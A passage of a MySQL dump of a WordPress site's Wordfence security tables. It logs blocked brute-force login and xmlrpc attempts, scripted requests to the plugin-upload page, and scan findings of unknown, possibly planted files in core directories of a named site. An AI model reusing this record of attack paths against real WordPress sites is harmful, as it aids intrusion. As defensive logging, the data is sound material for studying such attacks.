(KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12622,0.000000,1631569388.219382,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12623,0.000000,1631570635.601918,'\0\0\0\0\0\0\0\0\0\0�����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12624,1631570637.036940,1631570636.947700,'\0\0\0\0\0\0\0\0\0\0�����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12625,0.000000,1631571218.398842,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12626,1631571219.791265,1631571219.711900,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12627,0.000000,1631572788.735087,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12628,0.000000,1631576300.510890,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12629,0.000000,1631577827.158583,'\0\0\0\0\0\0\0\0\0\0��\"�+�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12630,0.000000,1631579174.620582,'\0\0\0\0\0\0\0\0\0\0���dW�',0,200,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','https://www.google.com/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(12631,0.000000,1631579835.594076,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12632,0.000000,1631583368.847130,'\0\0\0\0\0\0\0\0\0\0���>�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12633,0.000000,1631583877.871596,'\0\0\0\0\0\0\0\0\0\0��[���',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12634,0.000000,1631589448.892442,'\0\0\0\0\0\0\0\0\0\0���D??',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12635,0.000000,1631590372.292313,'\0\0\0\0\0\0\0\0\0\0�����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12636,1631590373.660601,1631590373.570300,'\0\0\0\0\0\0\0\0\0\0�����S',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12637,0.000000,1631591006.994812,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12638,1631591019.888169,1631591019.796600,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12639,0.000000,1631606265.431096,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12640,0.000000,1631607629.284729,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12641,0.000000,1631608298.294244,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12642,0.000000,1631608881.973078,'\0\0\0\0\0\0\0\0\0\0��k��2',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12643,0.000000,1631609304.985755,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12644,1631609316.619535,1631609316.496000,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12645,0.000000,1631609394.239601,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12646,0.000000,1631609623.396705,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12647,1631609625.383661,1631609625.306100,'\0\0\0\0\0\0\0\0\0\0��Ǩg�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12648,0.000000,1631609886.279809,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12649,0.000000,1631610417.842335,'\0\0\0\0\0\0\0\0\0\0��X�%1',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12650,0.000000,1631610887.502291,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12651,0.000000,1631611385.794609,'\0\0\0\0\0\0\0\0\0\0��p�H�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12652,0.000000,1631611874.470990,'\0\0\0\0\0\0\0\0\0\0��[�ɤ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12653,0.000000,1631612010.970676,'\0\0\0\0\0\0\0\0\0\0��[~�3',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12654,0.000000,1631612345.639547,'\0\0\0\0\0\0\0\0\0\0���GE�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12655,0.000000,1631612495.975908,'\0\0\0\0\0\0\0\0\0\0����Ŝ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12656,0.000000,1631612773.626376,'\0\0\0\0\0\0\0\0\0\0��3���',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12657,0.000000,1631612813.626637,'\0\0\0\0\0\0\0\0\0\0���HҌ',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12658,0.000000,1631613051.998501,'\0\0\0\0\0\0\0\0\0\0��6��p',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12659,0.000000,1631613282.581069,'\0\0\0\0\0\0\0\0\0\0��.e_A',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12660,0.000000,1631613325.221834,'\0\0\0\0\0\0\0\0\0\0��MD ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12661,0.000000,1631613746.456788,'\0\0\0\0\0\0\0\0\0\0��3D(',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12662,0.000000,1631613920.778242,'\0\0\0\0\0\0\0\0\0\0����6',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12663,0.000000,1631614161.556357,'\0\0\0\0\0\0\0\0\0\0���0�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12664,0.000000,1631614205.347470,'\0\0\0\0\0\0\0\0\0\0����h',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12665,0.000000,1631614602.749949,'\0\0\0\0\0\0\0\0\0\0���h,5',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12666,0.000000,1631614764.544121,'\0\0\0\0\0\0\0\0\0\0���ً',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12667,0.000000,1631615022.461711,'\0\0\0\0\0\0\0\0\0\0���]�`',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12668,0.000000,1631615093.748725,'\0\0\0\0\0\0\0\0\0\0��g	��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12669,0.000000,1631615397.764474,'\0\0\0\0\0\0\0\0\0\0��_o��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12670,0.000000,1631615504.667076,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12671,0.000000,1631615715.541995,'\0\0\0\0\0\0\0\0\0\0�����S',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL);
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=27729 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (26483,1631424636,1631424636,'new','knownfile',75,'17a41f2d20fd1e6e2eca93462235122a','32b09e4108f3bd5a3760049758897884','Unknown file in WordPress core: wp-admin/cachewpcheck.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:25:\"wp-admin/cachewpcheck.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26484,1631424643,1631424643,'new','knownfile',75,'709472fb98bc32851c46bb4aa85d0c4c','de383cc0bbcec8644cbf7b678a64eb2f','Unknown file in WordPress core: wp-admin/css/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:22:\"wp-admin/css/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26485,1631424671,1631424671,'new','knownfile',75,'f9b049d9647369ec3d98957d06f872e2','7496524082f5fce42cb951a219fe15fe','Unknown file in WordPress core: wp-admin/object-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:25:\"wp-admin/object-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26486,1631424674,1631424674,'new','knownfile',75,'bd1d87f489c5e786aa1738a02dd47307','74f70828494b800378dff8991f7fa89e','Unknown file in WordPress core: wp-admin/wpimages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:21:\"wp-admin/wpimages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26487,1631424846,1631424846,'new','knownfile',75,'77d22a1325de146ef63725812f5eb9ab','1a208a3b35c521da2d4f8be452da6057','Unknown file in WordPress core: wp-includes/wp-includes/ID3/getid3.lib.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/ID3/getid3.lib.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26488,1631424846,1631424846,'new','knownfile',75,'fe9a874ec8009d3060815c1cc9a4e051','c3468696bde65f3b3f53531d99abc16a','Unknown file in WordPress core: wp-includes/wp-includes/ID3/getid3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/ID3/getid3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26489,1631424846,1631424846,'new','knownfile',75,'3ab761f7a379c75523754f6eb25f6495','16fa993cca3a52799a237e16186704e7','Unknown file in WordPress core: wp-includes/wp-includes/ID3/license.commercial.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/ID3/license.commercial.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26490,1631424846,1631424846,'new','knownfile',75,'74d25a7ace50a31cbe9a7ce75d76db58','cea9af9cea1278fb9854952524eb579c','Unknown file in WordPress core: wp-includes/wp-includes/ID3/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/ID3/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26491,1631424846,1631424846,'new','knownfile',75,'48969b6fdf21d8b27695f59778813485','59daecd942898180a8e3e12bb1779c9d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.asf.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/ID3/module.audio-video.asf.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26492,1631424846,1631424846,'new','knownfile',75,'66c981e25885d5d103fa104f22d7afc5','9bfc8c5b58f564e73497a76b35662c1d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.flv.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/ID3/module.audio-video.flv.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26493,1631424846,1631424846,'new','knownfile',75,'024351a8f935cfacf4f17d9777e3f93a','fe5705e877454cc9b4dcca8c8635ab75','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.matroska.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/ID3/module.audio-video.matroska.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26494,1631424846,1631424846,'new','knownfile',75,'52c8abe6f45a44b2238bcac752ec83b4','f95bf679e45c454521cc91db7b7a21ed','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.quicktime.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/ID3/module.audio-video.quicktime.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26495,1631424846,1631424846,'new','knownfile',75,'ac15bc028d933f823abe12e7a4817984','99f963f807257004eeb98f9617bd3990','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio-video.riff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/ID3/module.audio-video.riff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26496,1631424846,1631424846,'new','knownfile',75,'a6b5a645eaa93694707f6879f9849998','91e937f26f1159d453b1235c3bc8550d','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.ac3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/ID3/module.audio.ac3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26497,1631424846,1631424846,'new','knownfile',75,'5d84704be6643a955009d85023719cbf','6b0d08c50060b7f69fda16a66be3bded','Unknown file in WordPress core: wp-includes/wp-includes/ID3/module.audio.dts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files 